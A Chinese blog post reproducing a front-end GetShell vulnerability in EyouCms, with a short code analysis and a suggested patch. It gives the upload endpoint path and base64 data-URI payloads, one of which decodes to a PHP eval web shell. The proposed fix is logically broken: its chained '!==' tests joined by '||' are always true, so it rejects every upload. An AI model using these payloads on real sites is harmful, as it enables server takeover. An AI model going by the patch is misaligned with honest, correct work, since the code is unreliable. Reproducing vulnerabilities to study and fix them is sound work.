网站首页 个人杂记 正文
广告位 后台主题配置管理 |
文章源自【字节脉搏社区】-字节脉搏实验室
作者-Beginners
0x01 EyouCms前台GetShell漏洞复现
EyouCms是一个自由和开放源码的内容管理系统,它是一个可以独立使用的内容发布系统(CMS)
0x02 漏洞复现:
利用路径:
/index.php/api/Uploadify/preview
POST数据构造:
data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==
直接访问:/preview/文件名.php
测试写入Shell:
data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs=
0x03 代码分析:
漏洞文件:applicationapicontrollerUploadify.php
漏洞触发函数:preview()
获取POST构造输入的数据,在利用preg_match()获取其中文件后缀和Base64编码数据赋值于$matches;
把获取的Base64编码数据$matches[2]和文件后缀$matches[1]拼接为文件名$filename;
判断文件是否存在,若不存在则$Base64进行base64解码后通过file_put_contents()写入文件中后输出$filename(文件名);到/preview/目录下;
0x04 漏洞修复:
使用白名单判断文件名后缀;
在Uploadify.php中213行到214行的代码修改为如下:
if ($type !== 'jpeg' || $type !=='png' || $type !=='gif' || $type!=='jpg') {
exit();
}
0x05 Cms下载地址:
下载地址:
https://share.weiyun.com/DGjtKLuR
- 上一篇: eyou 易邮去掉版权方法
- 下一篇: 曝光:UCLOUD云大使涉嫌欺骗推广员免费推广!
广告位 后台主题配置管理 |
你 发表评论:
欢迎- 2022-10-30收藏多年整理的各类资源网站全都分享出来
- 2022-10-29收集最全的各大银行信用卡限额交易设置方法
- 2022-10-29从root的Vivo手机中删除Bloatware
- 2022-10-28Vivo Mediatek机型LK(ABOOT)文件Android Verify Boot校验的困惑和一点研究
- 2022-10-20小米/红米手机彻底关闭系统更新提醒方案,免ROOT免ADB!
- 2022-10-12彻底删除小米手机MIUI系统级广告
- 2022-09-26nps内网映射专用客户端和服务端自动安装文件
- 2022-09-2614个比较经典的开发信模板
- 13613℃通达2015oa超级密码修改与清空方法
- 10269℃如何注册一个适合谷歌seo的域名
- 9628℃第三届中国衡商联盟(深圳)高峰论坛会邀请函
- 7456℃建站3天 日ip 300
- 7361℃衡商联盟写给天下自媒体的一封信:2016年,你很有可能会坐立难安!
- 7049℃谁敢横刀立马,唯我衡商兄弟连!-衡商精英群招募
- 6883℃1111半价免单(10日19点整理)
- 6881℃写给天下工厂的一封信:大象都倒下了,小心你也被干掉!
- 4288℃b2b网站营销要注意的细节问题
本文暂时没有评论,来添加一个吧(●'◡'●)